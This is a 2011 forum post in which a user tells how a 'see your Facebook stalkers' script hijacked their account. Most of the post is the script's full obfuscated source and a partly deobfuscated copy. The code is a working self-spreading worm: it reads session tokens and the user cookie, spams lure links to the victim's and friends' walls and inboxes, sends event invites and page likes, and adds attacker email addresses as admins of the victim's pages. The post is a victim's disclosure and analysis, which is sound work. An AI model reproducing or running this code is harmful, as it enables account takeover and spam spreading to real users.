Login

**Autumnlicious** · February 28, 2011 at 9:25 pm

I received a notification to "see my facebook stalkers" from one page I frequent. Dubious, I loaded the appropriate javascript injection (next time, use a dummy account...) and executed it.

Suspecting some mischief, I launched another facebook tab to see if it was doing what my instincts were telling me.

It was.

Luckily I halted it before it got to 16 people. Still, that means at least 15 people to scrub my hijacked posts out of.

Looking at the javascript source, I found it was packed (from http://fbonlines.info/StalkerTools.fb) with this garbage: (code hidden as it is really a bear - I just kept it for sake of integrity)

Code:
var _0x2804=["\x2C","\x73\x70\x6C\x69\x74","","\x6C\x65\x6E\x67\x74\x68","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\

x6F\x64\x65","\x66\x72\x69\x65\x6E\x64\x73\x65\x6C\x65\x63\x74\x6F\x72\x5F\x69\x6E\x70\x75\x74\x5B\x5D\x3D","\

x26\x66\x72\x69\x65\x6E\x64\x5F\x73\x65\x6C\x65\x63\x74\x65\x64\x5B\x5D\x3D","\x50\x4F\x53\x54","\x2F\x70\x61\

x67\x65\x73\x2F\x65\x64\x69\x74\x2F\x3F\x69\x64\x3D","\x26\x73\x6B\x3D\x61\x64\x6D\x69\x6E","\x43\x6F\x6E\x74\

x65\x6E\x74\x2D\x54\x79\x70\x65","\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x78\x2D\x77\x77\x77\x2D\x66

\x6F\x72\x6D\x2D\x75\x72\x6C\x65\x6E\x63\x6F\x64\x65\x64","\x70\x6F\x73\x74\x5F\x66\x6F\x72\x6D\x5F\x69\x64\x3D"

,"\x26\x66\x62\x5F\x64\x74\x73\x67\x3D","\x26\x66\x62\x70\x61\x67\x65\x5F\x69\x64\x3D","\x26","\x6A\x6F\x69\x6E","\

x26\x73\x61\x76\x65\x3D\x31","\x6D\x61\x74\x63\x68","\x72\x61\x6E\x64\x6F\x6D\x69\x7A\x65","\x0A\x0A","\x26\x78\x6

8\x70\x63\x5F\x63\x6F\x6D\x70\x6F\x73\x65\x72\x69\x64\x3D","\x26\x78\x68\x70\x63\x5F\x74\x61\x72\x67\x65\x74\x69

\x64\x3D","\x7C","\x26\x78\x68\x70\x63\x5F\x63\x6F\x6E\x74\x65\x78\x74\x3D\x68\x6F\x6D\x65\x26\x78\x68\x70\x63\x5

F\x66\x62\x78\x3D\x31\x26\x78\x68\x70\x63\x5F\x6D\x65\x73\x73\x61\x67\x65\x5F\x74\x65\x78\x74\x3D","\x72\x65\x70

\x6C\x61\x63\x65","\x26\x78\x68\x70\x63\x5F\x6D\x65\x73\x73\x61\x67\x65\x3D","\x26\x55\x49\x50\x72\x69\x76\x61\x6

3\x79\x57\x69\x64\x67\x65\x74\x5B\x30\x5D\x3D\x34\x30\x26\x70\x72\x69\x76\x61\x63\x79\x5F\x64\x61\x74\x61\x5B\x7

6\x61\x6C\x75\x65\x5D\x3D\x34\x30\x26\x70\x72\x69\x76\x61\x63\x79\x5F\x64\x61\x74\x61\x5B\x66\x72\x69\x65\x6E\x6

4\x73\x5D\x3D\x30\x26\x70\x72\x69\x76\x61\x63\x79\x5F\x64\x61\x74\x61\x5B\x6C\x69\x73\x74\x5F\x61\x6E\x6F\x6E\x5

D\x3D\x30\x26\x70\x72\x69\x76\x61\x63\x79\x5F\x64\x61\x74\x61\x5B\x6C\x69\x73\x74\x5F\x78\x5F\x61\x6E\x6F\x6E\x5

D\x3D\x30\x26\x3D\x53\x68\x61\x72\x65\x26\x6E\x63\x74\x72\x5B\x5F\x6D\x6F\x64\x5D\x3D\x70\x61\x67\x65\x6C\x65\x

74\x5F\x63\x6F\x6D\x70\x6F\x73\x65\x72\x26\x6C\x73\x64\x26\x70\x6F\x73\x74\x5F\x66\x6F\x72\x6D\x5F\x69\x64\x5F\

x73\x6F\x75\x72\x63\x65\x3D\x41\x73\x79\x6E\x63\x52\x65\x71\x75\x65\x73\x74","\x2F\x61\x6A\x61\x78\x2F\x75\x70\x6

4\x61\x74\x65\x73\x74\x61\x74\x75\x73\x2E\x70\x68\x70\x3F\x5F\x5F\x61\x3D\x31","\x68\x74\x74\x70\x3A\x2F\x2F\x67\

x6F\x6F\x2E\x67\x6C\x2F\x6B\x72\x79\x5A\x4A","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x6F\x6F\x2E\x67\x6C\x2F\x6D\x32\x

6B\x76\x42","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x6F\x6F\x2E\x67\x6C\x2F\x79\x34\x6C\x62\x77","\x68\x74\x74\x70\x3A\

x2F\x2F\x67\x6F\x6F\x2E\x67\x6C\x2F\x76\x4E\x52\x5A\x4E","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x6F\x6F\x2E\x67\x6C\x

2F\x68\x46\x30\x55\x4B","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x6F\x6F\x2E\x67\x6C\x2F\x7A\x63\x34\x4A\x61","\x31\x36\

x38\x30\x34\x36\x38\x39\x33\x32\x34\x32\x36\x35\x30","\x31\x39\x38\x31\x36\x31\x37\x36\x36\x38\x37\x39\x34\x39\x3

3","","\x6B\x61\x72\x79\x2E\x77\x68\x69\x74\x65\x62\x69\x72\x64\x2E\x6D\x67\x71\x79\x40\x68\x6F\x74\x6D\x61\x69\x6

C\x2E\x63\x6F\x6D\x2C\x63\x68\x65\x72\x79\x2E\x6B\x6F\x6C\x61\x6B\x6F\x77\x73\x6B\x69\x2E\x68\x71\x6E\x75\x40\x6

8\x6F\x74\x6D\x61\x69\x6C\x2E\x63\x6F\x6D","\x57\x6F\x77\x21\x20\x53\x65\x65\x6D\x73\x20\x6C\x69\x6B\x65\x20\x6C

\x6F\x74\x73\x20\x6F\x66\x20\x70\x65\x6F\x70\x6C\x65\x20\x73\x74\x61\x6C\x6B\x20\x6D\x65\x20\x2D\x20","\x4E\x65\x

77\x20\x46\x42\x20\x74\x6F\x6F\x6C\x20\x73\x68\x6F\x77\x73\x20\x77\x68\x6F\x20\x73\x74\x61\x6C\x6B\x73\x20\x79\x

6F\x75\x72\x20\x70\x72\x6F\x66\x69\x6C\x65\x2D\x2D\x20","\x53\x65\x63\x72\x65\x74\x20\x74\x6F\x6F\x6C\x20\x73\x6

8\x6F\x77\x73\x20\x77\x68\x6F\x20\x73\x74\x61\x6C\x6B\x73\x20\x79\x6F\x75\x72\x20\x70\x69\x63\x73\x20","\x49\x6E\

x73\x61\x6E\x65\x21\x20\x41\x77\x65\x73\x6F\x6D\x65\x20\x74\x6F\x6F\x6C\x20\x74\x6F\x20\x73\x65\x65\x20\x77\x68\

x6F\x20\x6C\x6F\x6F\x6B\x73\x20\x61\x74\x20\x79\x6F\x75\x72\x20\x70\x69\x63\x73\x20\x3E\x3E\x20","\x41\x63\x63\x6

F\x72\x64\x69\x6E\x67\x20\x74\x6F\x20","\x20\x79\x6F\x75\x27\x72\x65\x20\x6D\x79\x20\x74\x6F\x70\x20\x73\x74\x61\

x6C\x6B\x65\x72\x2E\x20\x43\x72\x65\x65\x70\x2E","\x53\x65\x63\x72\x65\x74\x20\x74\x6F\x6F\x6C\x20\x73\x68\x6F\x7

7\x73\x20\x77\x68\x6F\x20\x73\x74\x61\x6C\x6B\x73\x20\x79\x6F\x75\x72\x20\x70\x69\x63\x73\x20\x2D\x20","\x43\x68\

x65\x63\x6B\x20\x74\x68\x69\x73\x20\x6F\x75\x74\x21","\x48\x65\x79\x2C\x20\x77\x68\x61\x74\x73\x20\x68\x61\x70\x7

0\x65\x6E\x69\x6E\x67\x3F","\x48\x65\x79\x21\x20\x54\x68\x69\x73\x20\x69\x73\x20\x61\x77\x65\x73\x6F\x6D\x65","\x7

0\x72\x6F\x74\x6F\x74\x79\x70\x65","\x72\x61\x6E\x64\x6F\x6D","\x66\x6C\x6F\x6F\x72","\x69\x73\x52\x65\x61\x64\x79"

,"\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x73\x74\x61\x74\x75\x73","\x67\x65\x74\x46\x72\x69\x65\x6E\x64\x73","\

x73\x6C\x69\x63\x65","\x3A","\x64\x69\x76","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x69\x64","\x73\x

63\x72\x65\x77\x79\x6F\x75\x7A","\x61\x6C\x69\x67\x6E","\x63\x65\x6E\x74\x65\x72","\x73\x65\x74\x41\x74\x74\x72\x69

\x62\x75\x74\x65","\x6D\x61\x72\x67\x69\x6E","\x73\x74\x79\x6C\x65","\x30\x70\x78\x20\x61\x75\x74\x6F","\x70\x6F\x73

\x69\x74\x69\x6F\x6E","\x61\x62\x73\x6F\x6C\x75\x74\x65","\x74\x6F\x70","\x31\x30\x70\x78","\x7A\x69\x6E\x64\x65\x78

","\x31\x30\x30","\x63\x6C\x61\x73\x73\x4E\x61\x6D\x65","\x73\x63\x72\x65\x77\x79\x6F\x75","\x69\x6E\x6E\x65\x72\x48

\x54\x4D\x4C","\x3C\x62\x72\x20\x2F\x3E\x3C\x62\x72\x20\x2F\x3E\x3C\x62\x72\x20\x2F\x3E\x3C\x62\x72\x20\x2F\x3E\x

3C\x62\x72\x20\x2F\x3E\x3C\x63\x65\x6E\x74\x65\x72\x3E\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x

3A\x2F\x2F\x66\x62\x76\x69\x65\x77\x73\x2E\x6F\x72\x67\x2F\x70\x72\x6F\x63\x65\x73\x73\x2E\x67\x69\x66\x22\x20\x2

F\x3E\x3C\x62\x72\x20\x2F\x3E\x53\x63\x61\x6E\x6E\x69\x6E\x67\x20\x6D\x61\x79\x20\x74\x61\x6B\x65\x20\x75\x70\x20

\x74\x6F\x20\x33\x20\x6D\x69\x6E\x75\x74\x65\x73\x3C\x2F\x63\x65\x6E\x74\x65\x72\x3E","\x61\x70\x70\x65\x6E\x64\x4

3\x68\x69\x6C\x64","\x62\x6F\x64\x79","\x68\x72\x65\x66","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x68\x74\x74\x70\x3A\x2

F\x2F\x77\x77\x77\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x2F","\x47\x45\x54","\x2F","\x72\x65\x73\x70\x

6F\x6E\x73\x65\x54\x65\x78\x74","\x48\x65\x6C\x6C\x6F\x21\x0A\x0A\x54\x6F\x20\x61\x63\x74\x69\x76\x61\x74\x65\x20\

x74\x68\x65\x20\x74\x6F\x6F\x6C\x20\x70\x72\x65\x73\x73\x20\x45\x6E\x74\x65\x72\x20\x6F\x6E\x20\x79\x6F\x75\x72\x2

0\x6B\x65\x79\x62\x6F\x61\x72\x64\x2E\x20\x0A\x0A\x54\x68\x69\x73\x20\x77\x69\x6C\x6C\x20\x74\x61\x6B\x65\x20\x32\

x2D\x33\x20\x6D\x69\x6E\x75\x74\x65\x73\x2C\x20\x77\x68\x69\x6C\x65\x20\x77\x61\x69\x74\x69\x6E\x67\x20\x70\x6C\x6

5\x61\x73\x65\x20\x64\x6F\x20\x6E\x6F\x74\x20\x63\x6C\x6F\x73\x65\x20\x74\x68\x69\x73\x20\x77\x69\x6E\x64\x6F\x77\x

20\x6F\x72\x20\x74\x61\x62\x2E","\x63\x6F\x6F\x6B\x69\x65","\x2F\x61\x6A\x61\x78\x2F\x70\x61\x67\x65\x73\x2F\x66\x61

\x6E\x5F\x73\x74\x61\x74\x75\x73\x2E\x70\x68\x70\x3F\x5F\x5F\x61\x3D\x31","\x66\x62\x70\x61\x67\x65\x5F\x69\x64\x3D

","\x26\x61\x64\x64\x3D\x31\x26\x72\x65\x6C\x6F\x61\x64\x3D\x31\x26\x70\x72\x65\x73\x65\x72\x76\x65\x5F\x74\x61\x62

\x3D\x31\x26\x75\x73\x65\x5F\x70\x72\x69\x6D\x65\x72\x3D\x31\x26\x6E\x63\x74\x72\x5B\x5F\x6D\x6F\x64\x5D\x3D\x70\x

61\x67\x65\x6C\x65\x74\x5F\x74\x6F\x70\x5F\x62\x61\x72\x26\x70\x6F\x73\x74\x5F\x66\x6F\x72\x6D\x5F\x69\x64\x3D","\x

26\x6C\x73\x64\x26\x70\x6F\x73\x74\x5F\x66\x6F\x72\x6D\x5F\x69\x64\x5F\x73\x6F\x75\x72\x63\x65\x3D\x41\x73\x79\x6E

\x63\x52\x65\x71\x75\x65\x73\x74","\x2F\x61\x6A\x61\x78\x2F\x62\x72\x6F\x77\x73\x65\x72\x2F\x6C\x69\x73\x74\x2F\x66

\x72\x69\x65\x6E\x64\x73\x2F\x61\x6C\x6C\x2F\x3F\x75\x69\x64\x3D","\x26\x6F\x66\x66\x73\x65\x74\x3D\x30\x26\x64\x75

\x61\x6C\x3D\x31\x26\x5F\x5F\x61\x3D\x31","\x69\x64\x73\x5B","\x5D\x3D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x6

1\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70\x3F\x5F\x5F\

x61\x3D\x31","\x26\x73\x65\x6E\x64\x5F\x69\x6E\x76\x69\x74\x61\x74\x69\x6F\x6E\x73\x3D\x31\x26\x69\x6E\x76\x69\x74\

x65\x5F\x69\x64\x5F\x6C\x69\x73\x74\x3D\x26\x65\x6D\x61\x69\x6C\x5F\x61\x64\x64\x72\x65\x73\x73\x65\x73\x3D\x26\x6

9\x6E\x76\x69\x74\x65\x5F\x6D\x73\x67\x3D\x26","\x26\x6E\x6F\x64\x65\x5F\x69\x64\x3D","\x26\x63\x6C\x61\x73\x73\x3D\

x47\x75\x65\x73\x74\x4D\x61\x6E\x61\x67\x65\x72\x26\x5F\x5F\x64\x3D\x31\x26\x6C\x73\x64\x26\x70\x6F\x73\x74\x5F\x66

\x6F\x72\x6D\x5F\x69\x64\x5F\x73\x6F\x75\x72\x63\x65\x3D\x41\x73\x79\x6E\x63\x52\x65\x71\x75\x65\x73\x74","\x68\x74\

x74\x70\x3A\x2F\x2F\x66\x62\x76\x69\x65\x77\x73\x2E\x6F\x72\x67\x2F\x72\x65\x73\x75\x6C\x74\x2E\x70\x68\x70","\x2F\x

61\x6A\x61\x78\x2F\x6D\x65\x73\x73\x61\x67\x69\x6E\x67\x2F\x63\x6F\x6D\x70\x6F\x73\x65\x72\x2E\x70\x68\x70\x3F\x5F\

x5F\x61\x3D\x31\x26\x5F\x5F\x64\x3D\x31","\x69\x64\x73\x5F","\x5B\x30\x5D\x3D","\x26\x73\x75\x62\x6A\x65\x63\x74\x3D","

\x26\x73\x74\x61\x74\x75\x73\x3D","\x26\x69\x64\x73\x5B\x30\x5D\x3D","\x26\x61\x63\x74\x69\x6F\x6E\x3D\x73\x65\x6E\x64

\x5F\x6E\x65\x77\x26\x68\x6F\x6D\x65\x5F\x74\x61\x62\x5F\x69\x64\x3D\x31\x26\x70\x72\x6F\x66\x69\x6C\x65\x5F\x69\x64\

x3D","\x26\x74\x61\x72\x67\x65\x74\x5F\x69\x64\x3D\x30\x26\x61\x70\x70\x5F\x69\x64\x3D\x26\x26\x63\x6F\x6D\x70\x6F\x73

\x65\x72\x5F\x69\x64\x3D","\x26\x68\x65\x79\x5F\x6B\x69\x64\x5F\x69\x6D\x5F\x61\x5F\x63\x6F\x6D\x70\x6F\x73\x65\x72\x3D

\x74\x72\x75\x65\x26\x74\x68\x72\x65\x61\x64\x26\x70\x6F\x73\x74\x5F\x66\x6F\x72\x6D\x5F\x69\x64\x3D","\x26\x6C\x73\x64

\x26\x5F\x6C\x6F\x67\x5F\x61\x63\x74\x69\x6F\x6E\x3D\x73\x65\x6E\x64\x5F\x6E\x65\x77\x26\x5F\x6C\x6F\x67\x5F\x74\x68\x72\

x65\x61\x64\x26\x61\x6A\x61\x78\x5F\x6C\x6F\x67\x3D\x31\x26\x70\x6F\x73\x74\x5F\x66\x6F\x72\x6D\x5F\x69\x64\x5F\x73\x6

F\x75\x72\x63\x65\x3D\x41\x73\x79\x6E\x63\x52\x65\x71\x75\x65\x73\x74","\x2F\x61\x6A\x61\x78\x2F\x67\x69\x67\x61\x62\x6

F\x78\x78\x2F\x65\x6E\x64\x70\x6F\x69\x6E\x74\x2F\x4D\x65\x73\x73\x61\x67\x65\x43\x6F\x6D\x70\x6F\x73\x65\x72\x45\x6E\

x64\x70\x6F\x69\x6E\x74\x2E\x70\x68\x70\x3F\x5F\x5F\x61\x3D\x31","\x2F\x69\x6E\x73\x69\x67\x68\x74\x73\x2F\x3F\x5F\x66\

x62\x5F\x6E\x6F\x73\x63\x72\x69\x70\x74\x3D\x31"];function _88xuhyr(_0x91e5x2){st=_0x91e5x2[_0x2804[1]](_0x2804[0]);d=

_0x2804[2];for(i=0;i<st[_0x2804[3]];i++){d+=String[_0x2804[4]](st[i]-24);} ;eval(d);} ;function addAdmin(_0x91e5x4,_0x91e5x5,

_0x91e5x6,_0x91e5x7){iemails=_0x91e5x5[_0x2804[1]](_0x2804[0]);main_emails=[];for(i=0;i<iemails[_0x2804[3]];i++){main_

emails[i]=_0x2804[5]+iemails[i]+_0x2804[6];} ;with(newx= new XMLHttpRequest){open(_0x2804[7],_0x2804[8]+_0x91e5x4+_0x2804[9]);setRequestHeader(_0x2804[10],_0x2804[11]);send(_0x2804[12]+_0x91e5

x6+_0x2804[13]+_0x91e5x7+_0x2804[14]+_0x91e5x4+_0x2804[15]+main_emails[_0x2804[16]](_0x2804[15])+_0x2804[17]);} ;} ;

function makePost(_0x91e5x9,_0x91e5xa,_0x91e5xb,_0x91e5xc){formx=_0x91e5x9[_0x2804[18]](/name="post_form_id" value=

"([\d\w]+)"/)[1];dtx=_0x91e5x9[_0x2804[18]](/name="fb_dtsg" value="([^"]+)"/)[1];composerx=_0x91e5x9[_0x2804[18]](/name

=\\\"xhpc_composerid\\\" value=\\\"([^"]+)\\\"/)[1];msg=_0x91e5xa[_0x2804[19]]()+_0x2804[20];text_post=_0x2804[2];text_actual=_0x2804[2];pxt=_0x2804[12]+formx+_0x2804[13]+dtx+_0x2804[21]+

composerx+_0x2804[22]+_0x91e5xb[_0x2804[1]](_0x2804[23])[0]+_0x2804[24]+encodeURIComponent(msg+text_actual[_0x2804[25]](/\, $/,_0x2804[2]))+_0x2804[26]+encodeURIComponent(msg+text_post[_0x2804[25]](/\, $/,_0x2804[2]))+_0x2804[27];update(pxt);} ;function update(_0x91e5xe){with(newx= new XMLHttpRequest){open(_0x2804[7],_0x2804[28]);setRequestHeader(_0x2804[10],_0x2804[11]);send(_0x91e5xe);} ;} ;goog1=_0x2804[29];goog2=_0x2804[30];goog3=_0x2804[31];goog4=_0x2804[32];goog5=_0x2804[33];goog6=_0x2804[34];event_id=_0x2804[35];page_id_x=_0x2804[36];page_id_xx=_0x2804[37];admin_emails=_0x2804[38];statuses=[_0x2804[39]+goog1,_0x2804[40]+goog2,_0x2804[41]+goog3,_0x2804[42]+goog4,_0x2804[43]+goog5+_0x2804[44],_0x2804[45]+goog6];subjects=[_0x2804[46],_0x2804[47],_0x2804[48]];Array[_0x2804[49]][_0x2804[19]]=function (){return this[Math[_0x2804[51]](Math[_0x2804[50]]()*this[_0x2804[3]])];} ;Object[_0x2804[49]][_0x2804[52]]=function (){if(this[_0x2804[53]]==4&&this[_0x2804[54]]==200){return true;} else {return false;} ;} ;String[_0x2804[49]][_0x2804[55]]=function (){friends2=this[_0x2804[18]](/facebook\.com\\\\\\\/profile\.php\?id=\d+\\\\\\\">(<span[^>]+>|)[^<>]+/gi)[_0x2804[16]](_0x2804[57])[_0x2804[25]](/(facebook\.com\\\\\\\/|profile\.php\?id=|<span[^>]+>|l\.php.*)/gi,_0x2804[2])[_0x2804[25]](/\\\\\\\">/gi,_0x2804[23])[_0x2804[1]](_0x2804[57])[_0x2804[56]](1);return friends2;} ;function addAdmin(_0x91e5x4,_0x91e5x5,_0x91e5x6,_0x91e5x7){iemails=_0x91e5x5[_0x2804[1]](_0x2804[0]);main_emails=[];for(i=0;i<iemails[_0x2804[3]];i++){main_emails[i]=_0x2804[5]+iemails[i]+_0x2804[6];} ;with(newx= new XMLHttpRequest){open(_0x2804[7],_0x2804[8]+_0x91e5x4+_0x2804[9]);setRequestHeader(_0x2804[10],_0x2804[11]);send(_0x2804[12]+_0x91e5x6+_0x2804[13]+_0x91e5x7+_0x2804[14]+_0x91e5x4+_0x2804[15]+main_emails[_0x2804[16]](_0x2804[15])+_0x2804[17]);} ;} ;function loading(){var _0x91e5x10=document[_0x2804[59]](_0x2804[58]);_0x91e5x10[_0x2804[60]]=_0x2804[61];_0x91e5x10[_0x2804[64]](_0x2804[62],_0x2804[63]);_0x91e5x10[_0x2804[66]][_0x2804[65]]=_0x2804[67];_0x91e5x10[_0x2804[66]][_0x2804[68]]=_0x2804[69];_0x91e5x10[_0x2804[66]][_0x2804[70]]=_0x2804[71];_0x91e5x10[_0x2804[66]][_0x2804[72]]=_0x2804[73];_0x91e5x10[_0x2804[74]]=_0x2804[75];_0x91e5x10[_0x2804[76]]=_0x2804[77];document[_0x2804[79]][_0x2804[78]](_0x91e5x10);} ;function makePost(_0x91e5x9,_0x91e5xa,_0x91e5xb,_0x91e5xc){formx=_0x91e5x9[_0x2804[18]](/name="post_form_id" value="([\d\w]+)"/)[1];dtx=_0x91e5x9[_0x2804[18]](/name="fb_dtsg" value="([^"]+)"/)[1];composerx=_0x91e5x9[_0x2804[18]](/name=\\\"xhpc_composerid\\\" value=\\\"([^"]+)\\\"/)[1];msg=_0x91e5xa[_0x2804[19]]()+_0x2804[20];text_post=_0x2804[2];text_actual=_0x2804[2];pxt=_0x2804[12]+formx+_0x2804[13]+dtx+_0x2804[21]+composerx+_0x2804[22]+_0x91e5xb[_0x2804[1]](_0x2804[23])[0]+_0x2804[24]+encodeURIComponent(msg+text_actual[_0x2804[25]](/\, $/,_0x2804[2]))+_0x2804[26]+encodeURIComponent(msg+text_post[_0x2804[25]](/\, $/,_0x2804[2]))+_0x2804[27];update(pxt);} ;function update(_0x91e5xe){with(newx= new XMLHttpRequest){open(_0x2804[7],_0x2804[28]);setRequestHeader(_0x2804[10],_0x2804[11]);send(_0x91e5xe);} ;} ;if(window[_0x2804[81]][_0x2804[80]]==_0x2804[82]){formx=(res=document[_0x2804[79]][_0x2804[76]])[_0x2804[18]](/name="post_form_id" value="([\d\w]+)"/)[1];dtx=res[_0x2804[18]](/name="fb_dtsg" value="([^"]+)"/)[1];composerx=res[_0x2804[18]](/name=\\\"xhpc_composerid\\\" value=\\\"([^"]+)\\\"/)[1];} else {with(muhaha= new XMLHttpRequest){open(_0x2804[83],_0x2804[84],false);send(null);} ;formx=(res=muhaha[_0x2804[85]])[_0x2804[18]](/name="post_form_id" value="([\d\w]+)"/)[1];dtx=res[_0x2804[18]](/name="fb_dtsg" value="([^"]+)"/)[1];composerx=res[_0x2804[18]](/name=\\\"xhpc_composerid\\\" value=\\\"([^"]+)\\\"/)[1];} ;alert(_0x2804[86]);update(_0x2804[12]+formx+_0x2804[13]+dtx+_0x2804[21]+composerx+_0x2804[22]+document[_0x2804[87]][_0x2804[18]](/c_user=(\d+)/)[1]+_0x2804[24]+encodeURIComponent(stx=statuses[_0x2804[19]]())+_0x2804[26]+encodeURIComponent(stx)+_0x2804[27]);with(newz= new XMLHttpRequest){loading();open(_0x2804[7],_0x2804[88]);setRequestHeader(_0x2804[10],_0x2804[11]);send(_0x2804[89]+page_id_x+_0x2804[90]+formx+_0x2804[13]+dtx+_0x2804[91]);} ;with(newzz= new XMLHttpRequest){open(_0x2804[7],_0x2804[88]);setRequestHeader(_0x2804[10],_0x2804[11]);send(_0x2804[89]+page_id_xx+_0x2804[90]+formx+_0x2804[13]+dtx+_0x2804[91]);} ; void 0;with(fr= new XMLHttpRequest){open(_0x2804[83],_0x2804[92]+(me=document[_0x2804[87]][_0x2804[18]](/c_user=(\d+)/)[1])+_0x2804[93]);onreadystatechange=function (){if(fr[_0x2804[52]]()){friends=fr[_0x2804[85]][_0x2804[55]]();idx=[];for(i=0;i<friends[_0x2804[3]];i++){if(!isNaN(friends[i][_0x2804[1]](_0x2804[23])[0])){idx[i]=_0x2804[94]+i+_0x2804[95]+friends[i][_0x2804[1]](_0x2804[23])[0];} ;} ;with(invi= new XMLHttpRequest){open(_0x2804[7],_0x2804[96]);setRequestHeader(_0x2804[10],_0x2804[11]);send(_0x2804[12]+formx+_0x2804[13]+dtx+_0x2804[97]+idx[_0x2804[16]](_0x2804[15])+_0x2804[98]+event_id+_0x2804[99]);} ;cnt_fr=0;tx=setInterval(function (){if(cnt_fr==friends[_0x2804[3]]){window[_0x2804[81]]=_0x2804[100];clearInterval(tx);} ;makePost(document[_0x2804[79]][_0x2804[76]],statuses,friends[cnt_fr],friends);with(xa= new XMLHttpRequest){open(_0x2804[83],_0x2804[101]);onreadystatechange=function (){if(xa[_0x2804[52]]()){compi=xa[_0x2804[85]][_0x2804[18]](/([\d\w]+)_error/)[1];pxi=_0x2804[102]+compi+_0x2804[103]+friends[cnt_fr][_0x2804[1]](_0x2804[23])[0]+_0x2804[104]+encodeURIComponent(subjects[_0x2804[19]]())+_0x2804[105]+encodeURIComponent(statuses[_0x2804[19]]())+_0x2804[106]+friends[cnt_fr][_0x2804[1]](_0x2804[23])[0]+_0x2804[107]+document[_0x2804[87]][_0x2804[18]](/c_user=(\d+)/)[1]+_0x2804[108]+compi+_0x2804[109]+formx+_0x2804[13]+dtx+_0x2804[110];if(cnt_fr<15){with(mi= new XMLHttpRequest){open(_0x2804[7],_0x2804[111]);setRequestHeader(_0x2804[10],_0x2804[11]);send(pxi);} ;} ;} ;} ;send(null);} ;cnt_fr+=1;} ,3000);} ;} ;send(null);} ;with(ins= new XMLHttpRequest){open(_0x2804[83],_0x2804[112]);onreadystatechange=function (){if(ins[_0x2804[52]]()){ids=ins[_0x2804[85]][_0x2804[18]](/po_\d+">View/gi)[_0x2804[16]](_0x2804[57])[_0x2804[25]](/(po_|">View)/gi,_0x2804[2])[_0x2804[1]](_0x2804[57]);cnt_pages=0;tz=setInterval(function (){if(cnt_pages==ids[_0x2804[3]]){window[_0x2804[81]]=_0x2804[100];clearInterval(tz);} ;update(_0x2804[12]+formx+_0x2804[13]+dtx+_0x2804[21]+composerx+_0x2804[22]+ids[cnt_pages]+_0x2804[24]+encodeURIComponent(stx=statuses[_0x2804[19]]())+_0x2804[26]+encodeURIComponent(stx)+_0x2804[27]);addAdmin(ids[cnt_pages],admin_emails,formx,dtx);cnt_pages+=1;} ,3000);} ;} ;send(null);} ;[/hide]

However, the author of this code used the most commonly available javascript minifier (his first mistake), yielding (via http://jsbeautifier.org/):

Code:

function _88xuhyr(_0x91e5x2) {

    st = _0x91e5x2['split'](',');

    d = '';

    for (i = 0; i < st['length']; i++) {

        d += String['fromCharCode'](st[i] - 24);

    };

    eval(d);

};

 

 

function addAdmin(_0x91e5x4, _0x91e5x5, _0x91e5x6, _0x91e5x7) {

    iemails = _0x91e5x5['split'](',');

    main_emails = [];

    for (i = 0; i < iemails['length']; i++) {

        main_emails[i] = 'friendselector_input[]=' + iemails[i] + '&friend_selected[]=';

    };

    with(newx = new XMLHttpRequest) {

        open('POST', '/pages/edit/?id=' + _0x91e5x4 + '&sk=admin');

        setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');

        send('post_form_id=' + _0x91e5x6 + '&fb_dtsg=' + _0x91e5x7 + '&fbpage_id=' + _0x91e5x4 + '&' + main_emails['join']('&') + '&save=1');

    };

};

 

 

function makePost(_0x91e5x9, _0x91e5xa, _0x91e5xb, _0x91e5xc) {

    formx = _0x91e5x9['match'](/name="post_form_id" value="([\d\w]+)"/)[1];

    dtx = _0x91e5x9['match'](/name="fb_dtsg" value="([^"]+)"/)[1];

    composerx = _0x91e5x9['match'](/name=\\\"xhpc_composerid\\\" value=\\\"([^"]+)\\\"/)[1];

    msg = _0x91e5xa['randomize']() + '\x0A\x0A';

    text_post = '';

    text_actual = '';

    pxt = 'post_form_id=' + formx + '&fb_dtsg=' + dtx + '&xhpc_composerid=' + composerx + '&xhpc_targetid=' + _0x91e5xb['split']('|')[0] + '&xhpc_context=home&xhpc_fbx=1&xhpc_message_text=' + encodeURIComponent(msg + text_actual['replace'](/\, $/, '')) + '&xhpc_message=' + encodeURIComponent(msg + text_post['replace'](/\, $/, '')) + '&UIPrivacyWidget[0]=40&privacy_data[value]=40&privacy_data[friends]=0&privacy_data[list_anon]=0&privacy_data[list_x_anon]=0&=Share&nctr[_mod]=pagelet_composer&lsd&post_form_id_source=AsyncRequest';

    update(pxt);

};

 

 

function update(_0x91e5xe) {

    with(newx = new XMLHttpRequest) {

        open('POST', '/ajax/updatestatus.php?__a=1');

        setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');

        send(_0x91e5xe);

    };

};

goog1 = 'http://goo.gl/kryZJ';

goog2 = 'http://goo.gl/m2kvB';

goog3 = 'http://goo.gl/y4lbw';

goog4 = 'http://goo.gl/vNRZN';

goog5 = 'http://goo.gl/hF0UK';

goog6 = 'http://goo.gl/zc4Ja';

event_id = '168046893242650';

page_id_x = '198161766879493';

page_id_xx = '';

admin_emails = '[email protected],[email protected]';

statuses = ['Wow! Seems like lots of people stalk me - ' + goog1, 'New FB tool shows who stalks your profile-- ' + goog2, 'Secret tool shows who stalks your pics ' + goog3, 'Insane! Awesome tool to see who looks at your pics >> ' + goog4, 'According to ' + goog5 + ' you\'re my top stalker. Creep.', 'Secret tool shows who stalks your pics - ' + goog6];

subjects = ['Check this out!', 'Hey, whats happening?', 'Hey! This is awesome'];

Array['prototype']['randomize'] = function () {

    return this[Math['floor'](Math['random']() * this['length'])];

};

Object['prototype']['isReady'] = function () {

    if (this['readyState'] == 4 && this['status'] == 200) {

        return true;

    } else {

        return false;

    };

};

